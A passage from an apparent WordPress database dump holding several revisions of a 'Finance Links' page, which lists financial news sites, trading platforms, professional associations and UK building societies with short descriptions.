specializing in stock data analysis and provisions.\r\n\r\n<a href=\"http://equityfeed.com/\" target=\"_blank\" rel=\"noopener\">Equity Feed</a>: A site specifically targeting active traders and day traders.\r\n\r\n<a href=\"http://www.frbsf.org/\" target=\"_blank\" rel=\"noopener\">Federal Reserve Bank of San Francisco</a>: The site for the Federal Reserve Bank of San Francisco.\r\n\r\n<a href=\"http://thefinancialbrand.com/about/\" target=\"_blank\" rel=\"noopener\">The Financial Brand</a>: A site that focuses on marketing and strategy for retail banks and credit unions.\r\n\r\n<a class=\"broken_link\" href=\"http://fedfis.com/about-fis/\" target=\"_blank\" rel=\"noopener\">Financial Information Systems</a>: A site ran by innovative banking experts and technology leaders.\r\n\r\n<a href=\"http://www.financialpost.com/index.html#__federated=1\" target=\"_blank\" rel=\"noopener\">Financial Post</a>: A site for Canadian business and investment news and commentary.\r\n\r\n<a href=\"http://www.financialsense.com/\" target=\"_blank\" rel=\"noopener\">Financial Sense</a>: A weekly internet broadcast of news and commentary.\r\n\r\n<a href=\"http://www.franchising.com/\" target=\"_blank\" rel=\"noopener\">Franchise Update Media</a>: A site connecting franchise industry decision makers with information and resources.\r\n\r\n<a href=\"http://www.ibankingfaq.com/\" target=\"_blank\" rel=\"noopener\">IBanking FAQ</a>: A website with investment banking resources and information.\r\n\r\n<a href=\"http://independentbanker.org/\" target=\"_blank\" rel=\"noopener\">Independent Banker</a>: A site for community banking news, trends and insights.\r\n\r\n<a href=\"http://www.informationweek.com/\" target=\"_blank\" rel=\"noopener\">Information Week</a>: A site for the business technology professionals.\r\n\r\n<a href=\"http://ino.com/\" target=\"_blank\" rel=\"noopener\">INO.com</a>: A site specializing in the futures and options markets, with continuous quotes, charts and news.\r\n\r\n<a href=\"http://www.ici.org/\" target=\"_blank\" rel=\"noopener\">Investment Company Institute</a>: The website for the company working to advance the interests of mutual funds, their shareholders, directors and investment advisers.\r\n\r\n<a href=\"http://www.investopedia.com/\" target=\"_blank\" rel=\"noopener\">
Investopedia</a>: A site for beginners in the banking and financial industry that includes a stock simulator.\r\n\r\n<a href=\"http://www.investors.com/default.htm\" target=\"_blank\" rel=\"noopener\">Investor’s Business Daily</a>: A site for stock investment research and education, in addition to business and financial news.\r\n\r\n<a href=\"https://www.jpmorgan.com/pages/jpmorgan\" target=\"_blank\" rel=\"noopener\">JP Morgan</a>: The site for the JP Morgan financial company.\r\n\r\n<a href=\"http://www.kauffman.org/what-we-do/research\" target=\"_blank\" rel=\"noopener\">The Kauffman Foundation</a>: A research site helping businesses understand what drives innovation and economic growth.\r\n\r\n<a href=\"http://www.londonstockexchange.com/home/homepage.htm\" target=\"_blank\" rel=\"noopener\">London Stock Exchange</a>: The official website with stock prices and international markets for the London Stock Exchange.\r\n\r\n<a href=\"http://www.fool.com/?source=iflsittph0000001\" target=\"_blank\" rel=\"noopener\">The Motley Fool</a>: A site with current stock prices and investing advice.\r\n\r\n<a href=\"http://www.nasdaq.com/\" target=\"_blank\" rel=\"noopener\">Nasdaq</a>: The site for Nasdaq, which gives continuous updates throughout the day.\r\n\r\n<a href=\"https://www.nyse.com/index\" target=\"_blank\" rel=\"noopener\">New York Stock Exchange</a>: The site for the NYSE with information for investors and other financial professionals.\r\n\r\n<a href=\"https://www.probanx.com/\" target=\"_blank\" rel=\"noopener\">Probanx</a>: A site for eBanking software.\r\n\r\n<a href=\"http://www.sec.gov/\" target=\"_blank\" rel=\"noopener\">Securities and Exchange Commission</a>: As part of the Federal Government, the SEC protects investors and maintains market integrity among many other jobs in the finance industry.\r\n\r\n<a class=\"broken_link\" href=\"http://www.seisfund.com/home.html\" target=\"_blank\" rel=\"noopener\">SEIS Fund</a>: A start-up funding website for businesses.\r\n\r\n<a href=\"https://www.scottrade.com/online-trading/trading-website.html\" target=\"_blank\" rel=\"noopener\">Scottrade</a>: The website for the Scottrade financial company.\r\n\r\n<a href=\"http://www.shibuimarkets.com/\" target=\"_blank\" rel=\"noopener\">Shibui Markets</a>: A global financial portal that helps users understand financial information including foreign currency exchanges, emerging market bonds and international equities.\r\n\r\n<a href=\"http://www.standardandpoors.com/en_US/web/guest/home\" target=\"_blank\" rel=\"noopener\">Standard and Poor’s</a>: The site for the world’s leading contributor of independent credit ratings, risk evaluation and investment research.\r\n\r\n<a href=\"http://www.startupnation.com/\" target=\"_blank\" rel=\"noopener\">Startup Nation</a>: A site to help businesses grow and plan for their future.\r\n\r\n<a href=\"http://www.thestreet.com/\" target=\"_blank\" rel=\"noopener\">The Street</a>: A site giving financial news and information along with the stock market updates.\r\n\r\n<a href=\"http://stockcharts.com/\" target=\"_blank\" rel=\"noopener\">Stock Charts</a>: A site offering tools to create attractive financial charts.\r\n\r\n<a href=\"http://www.stockmarketgame.org/\" target=\"_blank\" rel=\"noopener\">The Stock Market Game</a>: A site with real time stock information and news on the stock markets.\r\n\r\n<a href=\"http://www.stocktrak.com/\" target=\"_blank\" rel=\"noopener\">Stock Trak</a>: A site for stock market game simulations.\r\n\r\n<a href=\"https://www.tdameritrade.com/home.page\" target=\"_blank\" rel=\"noopener\">TD Ameritrade</a>: The website for the financial trading company.\r\n\r\n<a href=\"http://www.ted.com/\" target=\"_blank\" rel=\"noopener\">TED</a>: A multitude of videos from the country’s most sought after business innovators and financial experts.\r\n\r\n<a href=\"http://www.updown.com/\" target=\"_blank\" rel=\"noopener\">UpDown</a>: A real-time trading simulation to help investors of all levels to improve their skills.\r\n\r\n<a href=\"https://personal.vanguard.com/us/funds/snapshot?FundId=0970&FundIntExt=INT\" target=\"_blank\" rel=\"noopener\">Vanguard</a>: The website for the financial planning company.\r\n<h3>Business Associations and Organizations</h3>\r\n<a href=\"http://www.aba.com/Pages/default.aspx\" target=\"_blank\" rel=\"noopener\">American Bankers Association</a>: Financial and regulatory information for bankers and financial professionals and consumers.\r\n\r\n<a href=\"http://www.afajof.org/view/index.html\" target=\"_blank\" rel=\"noopener\">American Financial Association</a>: An organization devoted to the study and promotion and knowledge of financial economics.\r\n\r\n<a href=\"http://www.imanet.org/ima_home.aspx\" target=\"_blank\" rel=\"noopener\">Association of Accountants and Financial Professionals in Business</a>: An organization to promote knowledge and professionalism among cost accountants and financial executives.\r\n\r\n<a href=\"http://www.afponline.org/\" target=\"_blank\" rel=\"noopener\">Association for Financial Professionals</a>: A professional society that represents finance executives globally.\r\n\r\n<a href=\"http://www.bis.org/about/index.htm\" target=\"_blank\" rel=\"noopener\">Bank for International Settlements</a>: The world’s oldest international financial organization.\r\n\r\n<a href=\"https://www.cfa.com/eweb/\" target=\"_blank\" rel=\"noopener\">Commercial Finance Associations</a>: The international trade association dedicated to the asset-based lending and factoring industries.\r\n\r\n<a href=\"http://www.efa-online.org/r/default.asp?iId=ILGLJ\" target=\"_blank\" rel=\"noopener\">European Finance Association</a>: A professional society of academics and practitioners with an interest in financial management, theory and application.\r\n\r\n<a href=\"http://www.financialexecutives.org/KenticoCMS/home.aspx#axzz3HgZcmiN7\" target=\"_blank\" rel=\"noopener\">Financial Executives International</a>: A site senior-level financial executives.\r\n\r\n<a href=\"http://fwa.org/\" target=\"_blank\" rel=\"noopener\">Financial Women’s Association</a>: An association for high-achieving financial professionals.\r\n\r\n<a href=\"http://www.gfma.org/\" target=\"_blank\" rel=\"noopener\">Global Financial Markets Association</a>: An association representing the world’s leading financial and capital market participants.\r\n\r\n<a href=\"http://www.icba.org/\" target=\"_blank\" rel=\"noopener\">The Independent Community Bankers of America</a>: A resource site for independent bankers.\r\n\r\n<a href=\"http://www.naifa.org/\" target=\"_blank\" rel=\"noopener\">National Association of Insurance and Financial Advisors</a>: An association representing the interests of insurance and financial advisors in the United States.\r\n\r\n<a href=\"http://www.sifma.org/about/\" target=\"_blank\" rel=\"noopener\">Securities Industry and Financial Markets Association</a>: An association that brings together the shared interests security firms, banks and asset managers.\r\n\r\n<a href=\"http://www.financialpro.org/\" target=\"_blank\" rel=\"noopener\">Society of Financial Service Professionals</a>: Society of financial professionals helping consumers with financial planning.\r\n<h3>News Agencies and Financial News</h3>\r\n<a href=\"http://www.americanbanker.com/\" target=\"_blank\" rel=\"noopener\">American Banker</a>: A website devoted to news from the US banking and finance industries.\r\n\r\n<a href=\"http://www.bloomberg.com/\" target=\"_blank\" rel=\"noopener\">Bloomberg News</a>: 24-hour news coverage on economies, markets, commerce, industries and governments.\r\n\r\n<a href=\"http://www.cnbc.com/\" target=\"_blank\" rel=\"noopener\">CNBC</a>: The business centered portion of NBC with 24-hour business news.\r\n\r\n<a href=\"http://www.cnn.com/\" target=\"_blank\" rel=\"noopener\">CNN</a>: The 24-hour news channel’s website that is constantly updated with breaking stories from around the world, including both financial, political and economic news.\r\n\r\n<a href=\"http://money.cnn.com/\" target=\"_blank\" rel=\"noopener\">CNN Money</a>: This site is devoted to financial and economic news from around the world.\r\n\r\n<a href=\"http://dealbreaker.com/\" target=\"_blank\" rel=\"noopener\">Dealbreaker</a>: A website with financial news, commentary and analysis about Wall Street.\r\n\r\n<a href=\"http://www.efinancialnews.com/\" target=\"_blank\" rel=\"noopener\">eFinancial News</a>: A securities and investment banking weekly news source.\r\n\r\n<a href=\"http://www.ft.com/home/us\" target=\"_blank\" rel=\"noopener\">Financial Times</a>: This site, based in the UK, provides international business, finance, economic and political news and commentary.\r\n\r\n<a href=\"http://www.foxbusiness.com/index.html\" target=\"_blank\" rel=\"noopener\">Fox Business News</a>: Website for the 24-news channel, focused on business news.\r\n\r\n<a href=\"https://www.google.com/finance\" target=\"_blank\" rel=\"noopener\">Google Finance</a>: This site provides real-time stock quotes and charts, financial news, currency conversion and portfolio tracking.\r\n\r\n<a href=\"http://www.ibtimes.com/\" target=\"_blank\" rel=\"noopener\">International Business Times</a>: This site provides international business news, financial news, market news and political commentary that many CEOs need to keep up to date on the ever-changing world around them.\r\n\r\n<a href=\"http://www.marketplace.org/\" target=\"_blank\" rel=\"noopener\">Marketplace</a>: A site from American Public Media centered on the economy, personal finance, Wall Street and World News.\r\n\r\n<a href=\"http://www.marketwatch.com/\" target=\"_blank\" rel=\"noopener\">Market Watch</a>: The financial website is a subsidiary of the Wall Street Journal. This site has up-to-date financial information and stock market numbers.\r\n\r\n<a href=\"http://www.msn.com/en-us/money\" target=\"_blank\" rel=\"noopener\">MSN Money</a>: The financial website of NBC News. This site provides information on personal finance and the stock markets.\r\n\r\n<a href=\"http://www.npr.org/\" target=\"_blank\" rel=\"noopener\">NPR</a>: Local, domestic and international news presented in various news programs and blogs.\r\n\r\n<a href=\"http://dealbook.nytimes.com/\" target=\"_blank\" rel=\"noopener\">NYT Dealbook</a>: A blog with business news and opinion columns on Wall Street.\r\n\r\n<a href=\"http://qz.com/\" target=\"_blank\" rel=\"noopener\">Quartz</a>: A relatively new news agency, focused on the global economy. News is designed to be read on tablets and smart phones.\r\n\r\n<a href=\"http://www.reuters.com/finance\" target=\"_blank\" rel=\"noopener\">Reuters Finance</a>: The top news organization’s site for financial news.\r\n\r\n<a class=\"broken_link\" href=\"http://seekingalpha.com/\" target=\"_blank\" rel=\"noopener\">Seeking Alpha</a>: This site provides breaking news and articles on stocks in real-time.\r\n\r\n<a href=\"http://finance.yahoo.com/\" target=\"_blank\" rel=\"noopener\">Yahoo Finance</a>: This site has up to date financial news, in addition to portfolio managements resources, international market date, message boards and more.\r\n\r\n ','Finance Links','','inherit','closed','closed','','125-revision-v1','','','2017-10-14 07:45:49','2017-10-14 07:45:49','',125,'http://santandershareholder.co.uk/125-revision-v1',0,'revision','',0),(129,1,'2017-10-14 07:52:34','2017-10-14 07:52:34','<h2>Financial Institutions, publications and websites of note</h2>\n \n<ul>\n <li><a href=\"http://fortune.com/\" target=\"_blank\" rel=\"noopener\">Fortune Magazine</a>: A magazine focused on Fortune 500 companies and breaking business news.</li>\n <li><a href=\"http://hbr.org/\" target=\"_blank\" rel=\"noopener\">Harvard Business Review</a></li>\n <li><a href=\"http://www.huffingtonpost.com/\" target=\"_blank\" rel=\"noopener\">Huffington Post</a> UK and US finance news</li>\n <li><a href=\"http://www.gfma.org/\" target=\"_blank\" rel=\"noopener\">Global Financial Markets Association</a>: An association representing the world’s leading financial and capital market participants.\n\n </li>\n <li><a href=\"http://www.icba.org/\" target=\"_blank\" rel=\"noopener\">The Independent Community Bankers of America</a>: A resource site for independent bankers.\n\n </li>\n <li><a href=\"http://www.naifa.org/\" target=\"_blank\" rel=\"noopener\">National Association of Insurance and Financial Advisors</a>: An association representing the interests of insurance and financial advisors in the United States.\n\n </li>\n <li><a href=\"http://www.sifma.org/about/\" target=\"_blank\" rel=\"noopener\">Securities Industry and Financial Markets Association</a>: An association that brings together the shared interests security firms, banks and asset managers.</li>\n <li><a href=\"http://www.kiplinger.com/\" target=\"_blank\" rel=\"noopener\">Kiplinger</a>: US magazine offering personal financial news, investing admire and business forecasts.</li>\n <li><a href=\"http://www.nytimes.com/pages/business/\" target=\"_blank\" rel=\"noopener\">The New York Times</a>: Breaking headlines + financial news from Wall Street.</li>\n <li><a href=\"http://time.com/\" target=\"_blank\" rel=\"noopener\">Time</a>: More in-depth political, economic and news worthy stories.</li>\n <li><a href=\"http://online.wsj.com/home-page\" target=\"_blank\" rel=\"noopener\">Wall Street Journal</a>: Newspaper focusing on domestic and international news with a business-focus.</li>\n <li><a href=\"https://www.hunterfinance.co.uk/apply-for-loan\" target=\"blank"\">Hunter Finance</a> UK finance house offering property loans</li>\n <li>FCA | Financial Conduct Authority</li>\n</ul>\n<strong>Other Finance websites</strong>\n<ul>\n <li><a href=\"http://waterfall-leasing.co.uk/\" target=\"blank"\">Waterfall leasing</a></li>\n <li><a href=\"http://mytermlifeinsurance.co.uk/\" target=\"blank"\">My term lifeinsurance</a></li>\n <li><a href=\"http://kings-college-brokers.co.uk/\" target=\"blank"\">Kings college brokers</a></li>\n <li><a href=\"http://firstchoiceloan.co.uk/\" target=\"blank"\">First choice UK loans</a></li>\n <li><a href=\"http://legal-medical.co.uk/\" target=\"blank"\">legal medical</a></li>\n <li><a href=\"http://rapc.co.uk/\" target=\"blank"\">rapc</a></li>\n <li><a href=\"http://humdrumming.co.uk/\" target=\"blank"\">Hum drumming</a></li>\n <li><a href=\"http://endowment-policy.co.uk/\" target=\"blank"\">Leading LLD Endowment policy</a></li>\n <li><a href=\"http://simply-accounting.co.uk/\" target=\"blank"\">TEC Simply accounting</a></li>\n <li><a href=\"http://fisa.co.uk/\" target=\"blank"\">FISA </a></li>\n <li><a href=\"http://slconsultancy.co.uk/\" target=\"blank"\">SLC (UK) Consultancy </a></li>\n <li><a href=\"http://wokingham-cab.org.uk/\" target=\"blank"\">Wokingham cab</a></li>\n <li><a href=\"http://delanceyandco.co.uk/\" target=\"blank"\">Delancey & co</a></li>\n</ul>\n<strong>List of All UK Building Societies</strong>\n\nBath Investment & Building Society\nBeverley Building Society\nBuckinghamshire Building Society\n\nCambridge Building Society\nChorley and District Building Society, The\nCoventry Building Society\nCumberland Building Society\n\nDarlington Building Society\nDudley Building Society\nDunfermline Building Society (In Administration)\n\nEarl Shilton Building Society\nEcology Building Society\n\nFurness Building Society\n\nHanley Economic Building Society\nHarpenden Building Society\nHinckley and Rugby Building Society\nHolmesdale Building Society\n\nIpswich Building Society\n\nLeeds Building Society\nLeek United Building Society\nLoughborough Building Society\nManchester Building Society\nMansfield Building Society, The\nMarket Harborough Building Society\nMarsden Building Society\nMelton Mowbray Building Society\nMonmouthshire Building Society\n\nNational Counties Building Society\nNationwide Building Society\nNewbury Building Society\nNewcastle Building Society\nNottingham Building Society\n\nPenrith Building Society\nPrincipality Building Society\nProgressive Building Society\n\nSaffron Building Society\nScottish Building Society\nSkipton Building Society\nStafford Railway Building Society, The\nSwansea Building Society\n\nTeachers\' Building Society\nTipton and Coseley Building Society\n\nVernon Building Society\n\nWest Bromwich Building Society\n\nYorkshire Building Society\n\nOther Financial links of interest\n\n \n\n<a href=\"http://www.accountingweb.com/\" target=\"_blank\" rel=\"noopener\">Accounting Web</a>: A site that provides accounting news, information, tips, tools and resources for financial professionals.\n\n<a href=\"http://www.annualreports.com/\" target=\"_blank\" rel=\"noopener\">Annual Reports</a>: This site allows users to view financial reports from companies.\n\n<a href=\"http://www.banktech.com/\" target=\"_blank\" rel=\"noopener\">Bank Systems and Technology</a>: A website for the banking informational technology community.\n\n<a href=\"http://www.bankersalmanac.com/addcon/home/resources.aspx\" target=\"_blank\" rel=\"noopener\">Bankers Almanac</a>: This site provides links to websites of international banks and other financial institutions.\n\n<a href=\"http://www.bankersonline.com/\" target=\"_blank\" rel=\"noopener\">Bankers Online</a>: A site for bankers and financial experts providing information on marketing, technology and e-banking.\n\n<a href=\"http://www.bizjournals.com/bizwomen\" target=\"_blank\" rel=\"noopener\">BizWomen</a>: A site for women business professionals.\n\n<a href=\"http://www.charteredbanker.com/\" target=\"_blank\" rel=\"noopener\">Chartered Banker Institute</a>: Find useful information and insights and resources into finance and banking.\n\n<a href=\"http://www.dailyfinance.com/\" target=\"_blank\" rel=\"noopener\">Daily Finance</a>: A site offering articles and information from leading business and financial experts.\n\n<a href=\"http://www.dividendinvestor.com/\" target=\"_blank\" rel=\"noopener\">Dividend Investor</a>: A site specializing in stock data analysis and provisions.\n\n<a href=\"http://equityfeed.com/\" target=\"_blank\" rel=\"noopener\">Equity Feed</a>: A site specifically targeting active traders and day traders.\n\n<a href=\"http://www.frbsf.org/\" target=\"_blank\" rel=\"noopener\">Federal Reserve Bank of San Francisco</a>: The site for the Federal Reserve Bank of San Francisco.\n\n \n\n<a href=\"http://www.franchising.com/\" target=\"_blank\" rel=\"noopener\">Franchise Update Media</a>: A site connecting franchise industry decision makers with information and resources.\n\n<a href=\"http://www.ibankingfaq.com/\" target=\"_blank\" rel=\"noopener\">IBanking FAQ</a>: A website with investment banking resources and information.\n\n<a href=\"http://independentbanker.org/\" target=\"_blank\" rel=\"noopener\">Independent Banker</a>: A site for community banking news, trends and insights.\n\n<a href=\"http://www.informationweek.com/\" target=\"_blank\" rel=\"noopener\">Information Week</a>: A site for the business technology professionals.\n\n<a href=\"http://ino.com/\" target=\"_blank\" rel=\"noopener\">INO.com</a>: A site specializing in the futures and options markets, with continuous quotes, charts and news.\n\n<a href=\"http://www.ici.org/\" target=\"_blank\" rel=\"noopener\">Investment Company Institute</a>: The website for the company working to advance the interests of mutual funds, their shareholders, directors and investment advisers.\n\n<a href=\"http://www.investopedia.com/\" target=\"_blank\" rel=\"noopener\">
Investopedia</a>: A site for beginners in the banking and financial industry that includes a stock simulator.\n\n<a href=\"http://www.investors.com/default.htm\" target=\"_blank\" rel=\"noopener\">Investor’s Business Daily</a>: A site for stock investment research and education, in addition to business and financial news.\n\n<a href=\"https://www.jpmorgan.com/pages/jpmorgan\" target=\"_blank\" rel=\"noopener\">JP Morgan</a>: The site for the JP Morgan financial company.\n\n<a href=\"http://www.kauffman.org/what-we-do/research\" target=\"_blank\" rel=\"noopener\">The Kauffman Foundation</a>: A research site helping businesses understand what drives innovation and economic growth.\n\n<a href=\"http://www.londonstockexchange.com/home/homepage.htm\" target=\"_blank\" rel=\"noopener\">London Stock Exchange</a>: The official website with stock prices and international markets for the London Stock Exchange.\n\n<a href=\"http://www.fool.com/?source=iflsittph0000001\" target=\"_blank\" rel=\"noopener\">The Motley Fool</a>: A site with current stock prices and investing advice.\n\n<a href=\"http://www.nasdaq.com/\" target=\"_blank\" rel=\"noopener\">Nasdaq</a>: The site for Nasdaq, which gives continuous updates throughout the day.\n\n<a href=\"https://www.nyse.com/index\" target=\"_blank\" rel=\"noopener\">New York Stock Exchange</a>: The site for the NYSE with information for investors and other financial professionals.\n\n<a href=\"https://www.probanx.com/\" target=\"_blank\" rel=\"noopener\">Probanx</a>: A site for eBanking software.\n\n<a href=\"http://www.sec.gov/\" target=\"_blank\" rel=\"noopener\">Securities and Exchange Commission</a>: As part of the Federal Government, the SEC protects investors and maintains market integrity among many other jobs in the finance industry.\n\n<a class=\"broken_link\" href=\"http://www.seisfund.com/home.html\" target=\"_blank\" rel=\"noopener\">SEIS Fund</a>: A start-up funding website for businesses.\n\n<a href=\"https://www.scottrade.com/online-trading/trading-website.html\" target=\"_blank\" rel=\"noopener\">Scottrade</a>: The website for the Scottrade financial company.\n\n<a href=\"http://www.shibuimarkets.com/\" target=\"_blank\" rel=\"noopener\">Shibui Markets</a>: A global financial portal that helps users understand financial information including foreign currency exchanges, emerging market bonds and international equities.\n\n<a href=\"http://www.standardandpoors.com/en_US/web/guest/home\" target=\"_blank\" rel=\"noopener\">Standard and Poor’s</a>: The site for the world’s leading contributor of independent credit ratings, risk evaluation and investment research.\n\n<a href=\"http://www.startupnation.com/\" target=\"_blank\" rel=\"noopener\">Startup Nation</a>: A site to help businesses grow and plan for their future.\n\n<a href=\"http://www.thestreet.com/\" target=\"_blank\" rel=\"noopener\">The Street</a>: A site giving financial news and information along with the stock market updates.\n\n<a href=\"http://stockcharts.com/\" target=\"_blank\" rel=\"noopener\">Stock Charts</a>: A site offering tools to create attractive financial charts.\n\n<a href=\"http://www.stockmarketgame.org/\" target=\"_blank\" rel=\"noopener\">The Stock Market Game</a>: A site with real time stock information and news on the stock markets.\n\n<a href=\"http://www.stocktrak.com/\" target=\"_blank\" rel=\"noopener\">Stock Trak</a>: A site for stock market game simulations.\n\n<a href=\"https://www.tdameritrade.com/home.page\" target=\"_blank\" rel=\"noopener\">TD Ameritrade</a>: The website for the financial trading company.\n\n<a href=\"http://www.ted.com/\" target=\"_blank\" rel=\"noopener\">TED</a>: A multitude of videos from the country’s most sought after business innovators and financial experts.\n\n<a href=\"http://www.updown.com/\" target=\"_blank\" rel=\"noopener\">UpDown</a>: A real-time trading simulation to help investors of all levels to improve their skills.\n\n<a href=\"https://personal.vanguard.com/us/funds/snapshot?FundId=0970&FundIntExt=INT\" target=\"_blank\" rel=\"noopener\">Vanguard</a>: The website for the financial planning company.\n<h3>Business Associations and Organizations</h3>\n<a href=\"http://www.aba.com/Pages/default.aspx\" target=\"_blank\" rel=\"noopener\">American Bankers Association</a>: Financial and regulatory information for bankers and financial professionals and consumers.\n\n<a href=\"http://www.afajof.org/view/index.html\" target=\"_blank\" rel=\"noopener\">American Financial Association</a>: An organization devoted to the study and promotion and knowledge of financial economics.\n\n<a href=\"http://www.imanet.org/ima_home.aspx\" target=\"_blank\" rel=\"noopener\">Association of Accountants and Financial Professionals in Business</a>: An organization to promote knowledge and professionalism among cost accountants and financial executives.\n\n<a href=\"http://www.afponline.org/\" target=\"_blank\" rel=\"noopener\">Association for Financial Professionals</a>: A professional society that represents finance executives globally.\n\n<a href=\"http://www.bis.org/about/index.htm\" target=\"_blank\" rel=\"noopener\">Bank for International Settlements</a>: The world’s oldest international financial organization.\n\n<a href=\"https://www.cfa.com/eweb/\" target=\"_blank\" rel=\"noopener\">Commercial Finance Associations</a>: The international trade association dedicated to the asset-based lending and factoring industries.\n\n<a href=\"http://www.efa-online.org/r/default.asp?iId=ILGLJ\" target=\"_blank\" rel=\"noopener\">European Finance Association</a>: A professional society of academics and practitioners with an interest in financial management, theory and application.\n\n<a href=\"http://www.financialexecutives.org/KenticoCMS/home.aspx#axzz3HgZcmiN7\" target=\"_blank\" rel=\"noopener\">Financial Executives International</a>: A site senior-level financial executives.\n\n<a href=\"http://fwa.org/\" target=\"_blank\" rel=\"noopener\">Financial Women’s Association</a>: An association for high-achieving financial professionals.\n\n \n\n<a href=\"http://www.financialpro.org/\" target=\"_blank\" rel=\"noopener\">Society of Financial Service Professionals</a>: Society of financial professionals helping consumers with financial planning.\n<h3>News Agencies and Financial News</h3>\n<a href=\"http://www.americanbanker.com/\" target=\"_blank\" rel=\"noopener\">American Banker</a>: A website devoted to news from the US banking and finance industries.\n\n<a href=\"http://www.bloomberg.com/\" target=\"_blank\" rel=\"noopener\">Bloomberg News</a>: 24-hour news coverage on economies, markets, commerce, industries and governments.\n\n<a href=\"http://www.cnbc.com/\" target=\"_blank\" rel=\"noopener\">CNBC</a>: The business centered portion of NBC with 24-hour business news.\n\n<a href=\"http://www.cnn.com/\" target=\"_blank\" rel=\"noopener\">CNN</a>: The 24-hour news channel’s website that is constantly updated with breaking stories from around the world, including both financial, political and economic news.\n\n<a href=\"http://money.cnn.com/\" target=\"_blank\" rel=\"noopener\">CNN Money</a>: This site is devoted to financial and economic news from around the world.\n\n<a href=\"http://dealbreaker.com/\" target=\"_blank\" rel=\"noopener\">Dealbreaker</a>: A website with financial news, commentary and analysis about Wall Street.\n\n<a href=\"http://www.efinancialnews.com/\" target=\"_blank\" rel=\"noopener\">eFinancial News</a>: A securities and investment banking weekly news source.\n\n<a href=\"http://www.ft.com/home/us\" target=\"_blank\" rel=\"noopener\">Financial Times</a>: This site, based in the UK, provides international business, finance, economic and political news and commentary.\n\n<a href=\"http://www.foxbusiness.com/index.html\" target=\"_blank\" rel=\"noopener\">Fox Business News</a>: Website for the 24-news channel, focused on business news.\n\n<a href=\"https://www.google.com/finance\" target=\"_blank\" rel=\"noopener\">Google Finance</a>: This site provides real-time stock quotes and charts, financial news, currency conversion and portfolio tracking.\n\n<a href=\"http://www.ibtimes.com/\" target=\"_blank\" rel=\"noopener\">International Business Times</a>: This site provides international business news, financial news, market news and political commentary that many CEOs need to keep up to date on the ever-changing world around them.\n\n<a href=\"http://www.marketplace.org/\" target=\"_blank\" rel=\"noopener\">Marketplace</a>: A site from American Public Media centered on the economy, personal finance, Wall Street and World News.\n\n<a href=\"http://www.marketwatch.com/\" target=\"_blank\" rel=\"noopener\">Market Watch</a>: The financial website is a subsidiary of the Wall Street Journal. This site has up-to-date financial information and stock market numbers.\n\n<a href=\"http://www.msn.com/en-us/money\" target=\"_blank\" rel=\"noopener\">MSN Money</a>: The financial website of NBC News. This site provides information on personal finance and the stock markets.\n\n<a href=\"http://www.npr.org/\" target=\"_blank\" rel=\"noopener\">NPR</a>: Local, domestic and international news presented in various news programs and blogs.\n\n<a href=\"http://dealbook.nytimes.com/\" target=\"_blank\" rel=\"noopener\">NYT Dealbook</a>: A blog with business news and opinion columns on Wall Street.\n\n<a href=\"http://qz.com/\" target=\"_blank\" rel=\"noopener\">Quartz</a>: A relatively new news agency, focused on the global economy. News is designed to be read on tablets and smart phones.\n\n<a href=\"http://www.reuters.com/finance\" target=\"_blank\" rel=\"noopener\">Reuters Finance</a>: The top news organization’s site for financial news.\n\n<a class=\"broken_link\" href=\"http://seekingalpha.com/\" target=\"_blank\" rel=\"noopener\">Seeking Alpha</a>: This site provides breaking news and articles on stocks in real-time.\n\n<a href=\"http://finance.yahoo.com/\" target=\"_blank\" rel=\"noopener\">Yahoo Finance</a>: This site has up to date financial news, in addition to portfolio managements resources, international market date, message boards and more.\n\n ','Finance Links','','inherit','closed','closed','','125-autosave-v1','','','2017-10-14 07:52:34','2017-10-14 07:52:34','',125,'http://santandershareholder.co.uk/125-autosave-v1',0,'revision','',0),(130,1,'2017-10-14 07:52:55','2017-10-14 07:52:55','<h2>Financial Institutions, publications and websites of note</h2>\r\n \r\n<ul>\r\n <li><a href=\"http://fortune.com/\" target=\"_blank\" rel=\"noopener\">Fortune Magazine</a>: A magazine focused on Fortune 500 companies and breaking business news.</li>\r\n <li><a href=\"http://hbr.org/\" target=\"_blank\" rel=\"noopener\">Harvard Business Review</a></li>\r\n <li><a href=\"http://www.huffingtonpost.com/\" target=\"_blank\" rel=\"noopener\">Huffington Post</a> UK and US finance news</li>\r\n <li><a href=\"http://www.gfma.org/\" target=\"_blank\" rel=\"noopener\">Global Financial Markets Association</a>: An association representing the world’s leading financial and capital market participants.\r\n\r\n </li>\r\n <li><a href=\"http://www.icba.org/\" target=\"_blank\" rel=\"noopener\">The Independent Community Bankers of America</a>: A resource site for independent bankers.\r\n\r\n </li>\r\n <li><a href=\"http://www.naifa.org/\" target=\"_blank\" rel=\"noopener\">National Association of Insurance and Financial Advisors</a>: An association representing the interests of insurance and financial advisors in the United States.\r\n\r\n </li>\r\n <li><a href=\"http://www.sifma.org/about/\" target=\"_blank\" rel=\"noopener\">Securities Industry and Financial Markets Association</a>: An association that brings together the shared interests security firms, banks and asset managers.</li>\r\n <li><a href=\"http://www.kiplinger.com/\" target=\"_blank\" rel=\"noopener\">Kiplinger</a>: US magazine offering personal financial news, investing admire and business forecasts.</li>\r\n <li><a href=\"http://www.nytimes.com/pages/business/\" target=\"_blank\" rel=\"noopener\">The New York Times</a>: Breaking headlines + financial news from Wall Street.</li>\r\n <li><a href=\"http://time.com/\" target=\"_blank\" rel=\"noopener\">Time</a>: More in-depth political, economic and news worthy stories.</li>\r\n <li><a href=\"http://online.wsj.com/home-page\" target=\"_blank\" rel=\"noopener\">Wall Street Journal</a>: Newspaper focusing on domestic and international news with a business-focus.</li>\r\n <li><a href=\"https://www.hunterfinance.co.uk/apply-for-loan\" target=\"blank"\">Hunter Finance</a> UK finance house offering property loans</li>\r\n <li><a href=\"https://www.fca.org.uk/\" target=\"_blank\" rel=\"noopener\">FCA | </a>Financial Conduct Authority</li>\r\n</ul>\r\n \r\n\r\n<strong>Other Finance websites</strong>\r\n<ul>\r\n <li><a href=\"http://waterfall-leasing.co.uk/\" target=\"blank"\">Waterfall leasing</a></li>\r\n <li><a href=\"http://mytermlifeinsurance.co.uk/\" target=\"blank"\">My term lifeinsurance</a></li>\r\n <li><a href=\"http://kings-college-brokers.co.uk/\" target=\"blank"\">Kings college brokers</a></li>\r\n <li><a href=\"http://firstchoiceloan.co.uk/\" target=\"blank"\">First choice UK loans</a></li>\r\n <li><a href=\"http://legal-medical.co.uk/\" target=\"blank"\">legal medical</a></li>\r\n <li><a href=\"http://rapc.co.uk/\" target=\"blank"\">rapc</a></li>\r\n <li><a href=\"http://humdrumming.co.uk/\" target=\"blank"\">Hum drumming</a></li>\r\n <li><a 